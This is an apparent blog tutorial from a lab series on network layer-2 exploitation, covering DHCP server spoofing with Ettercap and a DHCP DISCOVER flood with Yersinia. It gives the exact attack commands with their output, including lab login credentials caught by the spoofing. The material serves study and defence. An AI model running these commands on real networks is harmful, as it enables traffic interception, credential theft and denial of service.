WhiteWinterWolf.com - networkinghttps://www.whitewinterwolf.com/2017-11-23T00:00:00+01:00DHCP exploitation guide2017-10-30T00:00:00+01:002017-10-30T00:00:00+01:00WhiteWinterWolftag:www.whitewinterwolf.com,2017-10-30:/posts/2017/10/30/dhcp-exploitation-guide/<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> allows devices to automatically get their network configuration when
bringing up a network interface (typically when booting).</p>
<p>This configuration usually includes, among other thing, the <span class="caps">IP</span> address
attributed to the device, the <span class="caps">DNS</span> domain name and the <span class="caps">IP</span> address of the default
router, of the <span class="caps">DNS</span> server and of the NetBIOS name server.</p>
<p>This configuration, is allocated to the device only for a given time: the
<em>lease time</em>.
Lease time may vary largely depending on the environment requirements.
It is typical to find values ranging from a few dozen of minutes to a few weeks.
When half of the lease time expired, the device starts to try get in touch with
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server to renew the lease.</p>
<p>Clients initially asking for the attribution of an <span class="caps">IP</span> address start by
broadcasting a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> message.</p>
<p>A typical <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> exchange is as follow:</p>
<p><span class="lb-small"><img alt="Typical DHCP exchange" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/dhcp.png"/></span></p>
<ol>
<li>
<p><em><span class="caps">DISCOVER</span></em>: The client without <span class="caps">IP</span> address configured …</p></li></ol><p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> allows devices to automatically get their network configuration when
bringing up a network interface (typically when booting).</p>
<p>This configuration usually includes, among other thing, the <span class="caps">IP</span> address
attributed to the device, the <span class="caps">DNS</span> domain name and the <span class="caps">IP</span> address of the default
router, of the <span class="caps">DNS</span> server and of the NetBIOS name server.</p>
<p>This configuration, is allocated to the device only for a given time: the
<em>lease time</em>.
Lease time may vary largely depending on the environment requirements.
It is typical to find values ranging from a few dozen of minutes to a few weeks.
When half of the lease time expired, the device starts to try get in touch with
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server to renew the lease.</p>
<p>Clients initially asking for the attribution of an <span class="caps">IP</span> address start by
broadcasting a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> message.</p>
<p>A typical <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> exchange is as follow:</p>
<p><span class="lb-small"><a href="#dhcp.png" id="dhcp.png-thumb" title="Click to enlarge"><img alt="Typical DHCP exchange" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/dhcp.png"/></a></span></p>
<ol>
<li>
<p><em><span class="caps">DISCOVER</span></em>: The client without <span class="caps">IP</span> address configured sends this query to
obtain one from the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
As the client has no information whatsoever about the current network
configuration, not even the address of the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, the request is broadcasted on the local subnet.
The client <em>may</em> already ask for a previously leased <span class="caps">IP</span> address.</p>
</li>
<li>
<p>The server search on its side for a free address he can allocate to the
client.
This usually involves two mechanisms:</p>
<ul>
<li>
<p>The server maintains a local database of leased and available <span class="caps">IP</span> addresses.</p>
</li>
<li>
<p>Once an address candidate has been selected, depending on the server
implementation the server may take great care that the <span class="caps">IP</span>
is indeed not already used by sending one or two <abbr title="Address Resolution Protocol"><span class="caps">ARP</span></abbr> requests with
relatively large waiting time for any potential answer.</p>
</li>
</ul>
</li>
<li>
<p><em><span class="caps">OFFER</span></em>: The server proposes the address to the client.
For availability purposes <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> allows several servers to send concurrent
offers, the client choosing the “best” one.
This message is usually sent as unicast to the client <span class="caps">MAC</span> address.</p>
</li>
<li>
<p><em><span class="caps">REQUEST</span></em>: The client broadcasts the address it has chosen.
This allows all <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> servers involved in this exchange to be aware of the
client’s decision.</p>
<p>Clients wanting to renew an already acquired lease first attempt to directly
jump to this step of the discussion by sending a unicast <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">REQUEST</span>
message to the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server which issued the lease.</p>
</li>
<li>
<p><em><span class="caps">ACKNOWLEDGEMENT</span></em>: The server acknowledges the client decision and provides
him complementary network configuration settings (the various settings
mentioned earlier).</p>
</li>
</ol>
<p>There are several ways the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> protocol can be abused:</p>
<ul>
<li>
<p><em><abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attack</em>:
An attacker can spoof the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server and send forged replies to the client
with fake network settings allowing the attacker to intercept
upcoming client’s communication.</p>
</li>
<li>
<p><em><abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> attack</em>:
An attacker can simulate enough devices to empty the server’s free <span class="caps">IP</span>
addresses leases, thus preventing upcoming legitimate devices from being
able to obtain an address and, thus, from accessing the network.</p>
</li>
</ul>
<p>These are the attacks we will see in this article and the way to protect from them.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="DHCP exploitation lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/topology.png"/></a></span></p>
<p>This articles relies on the same topology as the rest of the series.
If you didn’t read the <a href="/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/" title="Practical network layer 2 exploitation: introduction">introduction post</a>, do it now.</p>
<p>For this lab we will use the <em>Users</em> and <em>Servers</em> <span class="caps">VLAN</span>.
The <em>Admins</em> <span class="caps">VLAN</span> will not be involved.</p>
<p>As per the tools, for the <abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> part we will use <a href="https://ettercap.github.io/ettercap/" rel="external" title="Ettercap project homepage">Ettercap</a> and <a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a>,
for the <abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> part we will use <a href="http://www.yersinia.net/" rel="external" title="Yersinia project homepage">Yersinia</a> and <a href="https://github.com/kamorin/DHCPig" rel="external" title="DHCPig GitHub page">DHCPig</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>While this series is about layer 2 exploitation, I still cover <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> which
is traditionally described as a layer 7 protocol as it involves <span class="caps">UDP</span>
communications between a client and a server and does not directly provide a
service to upper layers, like a routing protocol would do for instance.</p>
<p>Personally I don’t find this categorization to be so obvious and definitive.
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> is above all a cross-layers protocol: <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> servers need raw access to
the network layer 2, they are not constricted by local layer-3 firewall,
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> messages are not routable but are instead limited to a single layer 2
broadcast domain (unless you use a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> repeater).</p>
<p>Moreover, from a <em>functional</em> point-of-view and this is again my own
opinion, <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> builds a bridge between the layer 2 and layer 3 allowing a
device to obtain its own <span class="caps">IP</span> address (sometimes dependent of its <span class="caps">MAC</span>
address), in a similar fashion than <abbr title="Address Resolution Protocol"><span class="caps">ARP</span></abbr> and <abbr title="Reverse Address Resolution Protocol"><span class="caps">RARP</span></abbr> allows to resolve other
devices layer 2 and 3 addresses.</p>
<p>And at last I thought it made sense in this series, here between the
purely <span class="caps">MAC</span>-related issues from previous post and the <abbr title="Address Resolution Protocol"><span class="caps">ARP</span></abbr>-related issues
we will see in the next one, as it builds a logical evolution in both the
attacker abilities and the securing techniques.</p>
</div>
<h3 id="initial-state"><a class="toclink" href="#initial-state">Initial state</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>In our lab the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server is hosted on the main router, <em>R1</em>:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">show</span> ip dhcp pool VLAN1
<span class="go">Pool VLAN1 :</span>
<span class="go">Utilization mark (high/low) : 100 / 0</span>
<span class="go">Subnet size (first/next) : 0 / 0</span>
<span class="go">Total addresses : 254</span>
<span class="hll"><span class="go">Leased addresses : 2</span>
</span><span class="go">Pending event : none</span>
<span class="go">1 subnet is currently in the pool :</span>
<span class="go">Current index IP address range Leased addresses</span>
<span class="go">192.168.1.102 192.168.1.1 - 192.168.1.254 2</span>
<span class="gp">R1#</span><span class="k">show</span> ip dhcp binding
<span class="go">Bindings from all pools not associated with VRF:</span>
<span class="go">IP address Client-ID/ Lease expiration Type</span>
<span class="go"> Hardware address/</span>
<span class="go"> User name</span>
<span class="hll"><span class="go">192.168.1.100 0001.93e9.0e00 Mar 02 2002 12:00 AM Automatic</span>
</span><span class="hll"><span class="go">192.168.1.101 0100.0193.b701.00 Mar 02 2002 12:42 AM Automatic</span>
</span><span class="gp">R1#</span><span class="k">show</span> clock
<span class="go">*00:58:32.527 UTC Fri Mar 1 2002</span>
<span class="gp">R1#</span>
</pre></div>
<p>We can see that both the <em>Attacker</em> and the <em>User_1</em> machines got their network
configuration from this <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
Don’t pay attention to the lease expiration: I did not set the time.</p>
<p>We can check the network configuration on both of these hosts, here <em>User_1</em>:</p>
<ul>
<li>
<p>Default router and output interface:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> route -n
<span class="go">Kernel IP routing table</span>
<span class="go">Destination Gateway Genmask Flags Metric Ref Use Iface</span>
<span class="hll"><span class="go">0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 eth0</span>
</span><span class="go">127.0.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 lo</span>
<span class="go">192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
</li>
<li>
<p><span class="caps">IP</span> address assigned to the default output interface:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> ifconfig eth0
<span class="go">eth0 Link encap:Ethernet HWaddr 00:01:93:B7:01:00</span>
<span class="hll"><span class="go"> inet addr:192.168.1.101 Bcast:192.168.1.255 Mask:255.255.255.0</span>
</span><span class="go"> inet6 addr: fe80::201:93ff:feb7:100/64 Scope:Link</span>
<span class="go"> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1</span>
<span class="go"> RX packets:157 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> TX packets:160 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> collision:0 txqueuelen:1000</span>
<span class="go"> RXbytes:12228 (11.9 KiB) TX bytes:14204 (13.8 KiB)</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
</li>
<li>
<p>No <span class="caps">DNS</span> server configured:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> cat /etc/resolv.conf
<span class="gp">gns3@box:~$</span>
</pre></div>
</li>
</ul>
<h3 id="attacks"><a class="toclink" href="#attacks">Attacks</a></h3>
<h4 id="dhcp-server-spoofing-mitm-attack"><a class="toclink" href="#dhcp-server-spoofing-mitm-attack"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server spoofing (<abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attack)</a></h4>
<h5 id="first-a-bit-of-theory"><a class="toclink" href="#first-a-bit-of-theory">First a bit of theory</a></h5>
<p>Unless the attacker managed to somehow cut the communication between the client
and the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, the attacker’s rogue <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server races against the
legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server: his answers must come first to the client otherwise
they will most likely be ignored.</p>
<p>An attacker may attempt to forge either the <span class="caps">OFFER</span> or the <span class="caps">ACK</span> replies, each
having its own set of advantages and limitations<sup id="fnref-ideal-world"><a class="footnote-ref" href="#fn-ideal-world">1</a></sup>:</p>
<ul>
<li>
<p>Forging the <span class="caps">OFFER</span> usually offers almost certain chances to win the race.
Indeed, while the legitimate server takes time to ensure that no device
on the network is already using the <span class="caps">IP</span> candidate, the attacker don’t care
of such subtleties and directly sends his forged <span class="caps">OFFER</span> answer to the client.
Moreover, a desperate attacker may resort to first DOSing the legitimate
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server to get rid of it.</p>
<p>However, this has two main limitations:</p>
<ul>
<li>
<p>The attacker must use its own <span class="caps">IP</span> addresses pool, which may potentially
conflict with the legitimate server pool and generate some panic on the network.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Duplicates <span class="caps">IP</span> can generate real trouble.</p>
<p>Don’t try this in real environments unless you know what you are
doing or expect to <abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> the network anyway.</p>
</div>
</li>
<li>
<p>If the client specifically asked for a previously leased <span class="caps">IP</span> address
in its <span class="caps">DISCOVER</span> message, then the answer from the legitimate server
might still be considered the “best” one even-though it was received
later as long as it allows the client to keep its requested <span class="caps">IP</span> address.</p>
</li>
</ul>
</li>
<li>
<p>Wining the race when forging the <span class="caps">ACKNOWLEDGEMENT</span> is more random and depends
on various factors, in particular the position of the involved parties in
the topology.
The attack has the most chances to succeed when the attacker is closer of
the target than the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, which is not unusual.</p>
<p>Moreover, the interception won’t survive a lease renewal: when the client
reaches half of its lease time, it will send a <em>unicast</em> <span class="caps">REQUEST</span> to
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server who issued the <span class="caps">IP</span>.
In this case, the client will contact the legitimate server, which will
in turn provide him the legitimate network settings in its acknowledgement.</p>
<p>As long as the environment allows it, I think this is the most elegant and
reliable choice as the client ends with a valid <span class="caps">IP</span> address legitimately
leased by the real <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
In fact, from the point of view of the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, everything went
normally, the only difference being in the network settings finally applied
by the client.</p>
</li>
</ul>
<p>As seen above, a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server provides among other settings the <span class="caps">IP</span> addresses of
the default router and of the <span class="caps">DNS</span> server.
The attacker may fake either of these:</p>
<ul>
<li>
<p>By faking the default router address, all the victim’s communication will
go through a machine controlled by the attacker.</p>
</li>
<li>
<p>By faking the <span class="caps">DNS</span> server address, the attacker puts himself between
the client and the legitimate <span class="caps">DNS</span> server, controlling the content of <span class="caps">DNS</span>
answers reaching to the client.
This allows to more finely select which part of the
communication to redirect to an attacker controlled machine (fake <span class="caps">DNS</span>
answers) and which part to leave as-is (real <span class="caps">DNS</span> answers).
This may also be useful to bypass security measures relying on <span class="caps">DNS</span> answers.</p>
</li>
</ul>
<p>Each have their own advantages, but each have the disadvantage that the target
will loose its network connectivity as soon as the attack
ends<sup id="fnref-configurable-leases"><a class="footnote-ref" href="#fn-configurable-leases">2</a></sup>.</p>
<p>In this lab we will spoof the router <span class="caps">IP</span> address provided in the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">ACK</span>
message, and mention how to apply this techniques to <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">OFFER</span> as well.</p>
<h5 id="and-now-practice"><a class="toclink" href="#and-now-practice">And now, practice!</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>For the attack itself, we will use <a href="https://ettercap.github.io/ettercap/" rel="external" title="Ettercap project homepage">Ettercap</a>.
I recommend however to also run <a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a> to get a better understanding of
what is going-on on the line.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>When running Wireshark from within the attacker’s host, you will have only
a partial view of the story.
In fact, you will not see the unicast responses sent by the legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
server to the client.</p>
<p>As far as the lab is concerned, if you want to have a more complete view
you can either run Wireshark directly on the <em>User_1</em> and run <code>dhclient</code>
instead of restarting to refresh your <span class="caps">IP</span> or, if you are using <span class="caps">GNS3</span>, you
can simply launch a Wireshark directly on the link between <em>User_1</em> and its
nearest switch <em><span class="caps">ESW2</span></em> by right-clicking on the link and then selecting the
<em>Start capture</em> option (I love this feature!).</p>
<p>This will allow you to observe the reply of both the legitimate and the
rogue <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> servers as they reach the client.</p>
</div>
<p>We will use Ettercap with the following parameters:</p>
<ul>
<li><code>-T</code>: For the text mode, as opposed to the <span class="caps">GUI</span>, curses or daemon mode.</li>
<li><code>-z</code>: Skip the initial scanning of running hosts in the local subnet.</li>
<li><code>-q</code>: Don’t print packets details (we already have Wireshark for that, we
don’t want to clutter Ettercap output with this kind of information).</li>
<li><code>-M</code>: Select the <abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attack to use, here it is <code>dhcp</code> with the following
slash-separated arguments:<ul>
<li>Empty <span class="caps">IP</span> range: Ettercap will only fake <span class="caps">ACK</span> messages.
Set this to an (hopefully unused) <span class="caps">IP</span> range to allow Ettercap to
generate <span class="caps">OFFER</span> messages, for instance <code>192.168.1.50-192.168.1.99</code>.</li>
<li><code>255.255.255.0</code>: The network mask.</li>
<li><code>192.168.1.1</code>: The <span class="caps">DNS</span> server address (this value is nonsense, but this
argument is required).</li>
</ul>
</li>
</ul>
<p>This gives us the following result:</p>
<div class="codehilite"><pre><span class="hll"><span class="gp">root@kali:~#</span> ettercap -Tzq -M dhcp:/255.255.255.0/192.168.1.1
</span>
<span class="go">ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team</span>
<span class="go">Listening on:</span>
<span class="go">eth0 -> 00:01:93:E9:0E:00</span>
<span class="go"> 192.168.1.100/255.255.255.0</span>
<span class="go"> fe80::201:93ff:fee9:e00/64</span>
<span class="go">SSL dissection needs a valid 'redir_command_on' script in the etter.conf file</span>
<span class="go">Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.</span>
<span class="go">Privileges dropped to EUID 65534 EGID 65534...</span>
<span class="go">33 plugins</span>
<span class="go">42 protocol dissectors</span>
<span class="go">57 ports monitored</span>
<span class="go">20388 mac vendor fingerprint</span>
<span class="go">1766 tcp OS fingerprint</span>
<span class="go">2182 known services</span>
<span class="go">Lua: no scripts were specified, not starting up!</span>
<span class="go">DHCP spoofing: using specified ip_pool, netmask 255.255.255.0, dns 192.168.1.1</span>
<span class="go">Starting Unified sniffing...</span>
<span class="go">Text only Interface activated...</span>
<span class="go">Hit 'h' for inline help</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Ettercap also provides a <span class="caps">GUI</span>, you can get it by running <code>ettercap -G</code>or
through the <em>Applications</em> menu of your desktop manager.</p>
<p>Once started, go in <em>Sniff</em> > <em>Unified sniffing</em> and select the network
interface to use.
Then all the expected options will become available.</p>
<p>The <span class="caps">GUI</span> allows to use several tabs to manage the detected hosts, the
<abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> targets, the intercepted connections, etc.
Depending on your usage and habits, you may find it more convenient than
the command-line.</p>
</div>
<p>Leave Ettercap and Wireshark running, and now reboot the <em>User_1</em> host.</p>
<p>Things should be moving on Ettercap’s side:</p>
<div class="codehilite"><pre>DHCP: [00:01:93:B7:01:00] DISCOVER
DHCP: [00:01:93:B7:01:00] REQUEST 192.168.1.101
DHCP spoofing: fake ACK [00:01:93:B7:01:00] assigned to 192.168.1.101
</pre></div>
<ol>
<li>First Ettercap detected a broadcasted <span class="caps">DISCOVER</span> message, but since we did
not provide an <span class="caps">IP</span> range it did not react to it.</li>
<li>Then Ettercap detected a broadcasted <span class="caps">REQUEST</span> message bearing the <span class="caps">IP</span> address
allocated by the legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, it reacted by sending a fake <span class="caps">ACK</span>
to the client with our customized router address.</li>
</ol>
<p>If you have a Wireshark running between <em>User_1</em> and its nearest switch, you
can see the the two competing <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">ACK</span> paquets:</p>
<p><span class="lb-small"><a href="#two-ack.png" id="two-ack.png-thumb" title="Click to enlarge"><img alt="Two competing DHCP ACK paquets" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/two-ack.png"/></a></span></p>
<p>The forged <span class="caps">ACK</span> containing the attacker’s <span class="caps">IP</span> as default router address managed
to slip through a few hundredth of second before the legitimate <span class="caps">ACK</span>, and was
therefore the one taken into account by the client:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> route -n
<span class="go">Kernel IP routing table</span>
<span class="go">Destination Gateway Genmask Flags Metric Ref Use Iface</span>
<span class="hll"><span class="go">0.0.0.0 192.168.1.100 0.0.0.0 UG 0 0 0 eth0</span>
</span><span class="go">127.0.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 lo</span>
<span class="go">192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
<p>The <em>User_1</em> host now uses the attacker’s machine as default router.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Depending on your luck you may need to try a second, or even a third time
before succeeding (as explained in the <a href="/posts/2017/10/25/mac-address-table-overflow/#session-stealing" title="MAC address table overflow: session stealing attack">previous post</a>, in
real-life there will be several computers booting together at the beginning
of the work day, as many chances for successful interception).</p>
<p>If for some reason Ettercap seems to systematically loose the race against
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, quit the current Ettercap session by pressing <code>q</code> and
try to forge <span class="caps">OFFER</span> replies instead:</p>
<div class="codehilite"><pre>ettercap -Tzq -M dhcp:192.168.1.50-192.168.1.99/255.255.255.0/192.168.1.1
</pre></div>
</div>
<p>Now, still from the <em>User_1</em> host, connect and open a session on <em>Server_1</em>
administration interface.</p>
<p>Here again things should move in Ettercap:</p>
<div class="codehilite"><pre>HTTP : 192.168.3.100:80 -> USER: user PASS: bitnami INFO: http://192.168.3.100/wp-login.php?redirect_to=http://192.168.3.100/wp-admin/&reauth=1
CONTENT: log=user&pwd=bitnami&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.3.100%2Fwp-admin%2F&testcookie=1
</pre></div>
<p>User’s credentials have been successfully intercepted by Ettercap!</p>
<p>If you check the data captured at the same by the Wireshark running on the
attacker’s host, you may notice several things (in addition to the fact
that Wireshark too captured the user’s credentials):</p>
<p><span class="lb-small"><a href="#wireshark-attacker.png" id="wireshark-attacker.png-thumb" title="Click to enlarge"><img alt="Wireshark capture on attacker's host" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/wireshark-attacker.png"/></a></span></p>
<ul>
<li>
<p>First, Wireshark notices a lot of duplicated, retransmitted and
out-of-order packets (the black lines in the screenshot).</p>
<p>This is normal and expected: Ettercap indeed replays all packets received
from the victim to send them to their real target, changing only data-link
layer information.
This confuses Wireshark which interprets this as a network issue.</p>
</li>
<li>
<p>Then, in a similar fashion as in <a href="/posts/2017/10/25/mac-address-table-overflow/#eavesdropping" title="MAC address table overflow: eavesdropping">the previous post</a>, we have
access to only one side of the communication: the client-side this time.</p>
<p>This however is just a limitation of the tool we are using.
Ettercap only rewrite the data link layer information (the <span class="caps">MAC</span> addresses)
before forwarding the messages, meaning that they keep their original
source <span class="caps">IP</span> address.
The reply therefore are directly sent to the client without going through
the attacker’s host.</p>
<p>From a technical point-of-view, Ettercap could very-well implement a
<span class="caps">NAT</span>-like functionality which would allow the reply to be routed to the
attacker’s machine too<sup id="fnref-NAT"><a class="footnote-ref" href="#fn-NAT">3</a></sup>.
This would provide a full-duplex interception of the target’s communication.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>There are two main impact of an half-duplex interception:</p>
<ul>
<li>
<p>Obviously, as with the half-duplex sniffing we had in the previous lab,
you can only read one side of the communication.</p>
</li>
<li>
<p>But as this is an interception, you also gained write abilities, but
this ability is restricted as you cannot alter packets length.
Indeed, having access to only one side of the communication means you
cannot adjust the <span class="caps">TCP</span> window acknowledgement coming from the server.
Any change in packet size would break the communication (but the
packet content can be freely changed).</p>
</li>
</ul>
<p>In a full-duplex interception, both the content and size of the packets can
be changed.
Full-duplex interception will be covered in the next post of this series.</p>
</div>
<h4 id="dos-attacks"><a class="toclink" href="#dos-attacks"><abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> attacks</a></h4>
<h5 id="dhcp-discover-flood"><a class="toclink" href="#dhcp-discover-flood"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> flood</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p><a href="http://www.yersinia.net/" rel="external" title="Yersinia project homepage">Yersinia</a> offers a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> flood functionality, however this should not be
confused with an actual <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation attack as the effect of this one is
far more temporary (this may or may not be an advantage, depending on what you
are trying to achieve).</p>
<p>In this attack, Yersinia sends <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> messages to the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server at a
very high rate, most probably far higher than what he can reasonably handle
(a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server doesn’t have the same requirement as, say, an Internet facing
web server).
Depending on the server implementation, it is probable that this attack may not
even be able to fill the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server leases table, however it will effectively
make the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server unavailable for the duration of the attack:</p>
<ul>
<li>
<p>Due to the load and locking issues, the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> will be mostly unable to
process any legitimate request for the duration of the flood.</p>
</li>
<li>
<p>Once the flood stops, since Yersinia did not take care of answering to any
<span class="caps">OFFER</span> sent by the server, then the server will automatically delete all
flood-related entries from its leases database after a relatively short
timeout (five minutes in this lab, but this may vary depending on the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
server used).</p>
</li>
</ul>
<p>To launch the attack, use the following command:</p>
<div class="codehilite"><pre><span class="hll"><span class="gp">root@kali:~#</span> yersinia dhcp -attack 1
</span><span class="go">Warning: interface eth0 selected as the default one</span>
<span class="go"><*> Starting DOS attack sending DISCOVER packet...</span>
<span class="go"><*> Press any key to stop the attack <*></span>
</pre></div>
<p><em>R1</em> itself may now have trouble to access its own leases database (this
command will return only after the expiration of an internal timeout):</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">show</span> ip dhcp pool VLAN1
<span class="go">% The DHCP database could not be locked. Please retry the command later.</span>
<span class="gp">R1#</span>
</pre></div>
<p>As stated above the leases database will remain unavailable this way for a few
time even after the end of the flood.
However, it will be just a matter of minutes for the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server to
automatically get back to its working state.</p>
<h5 id="dhcp-starvation"><a class="toclink" href="#dhcp-starvation"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> starvation</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
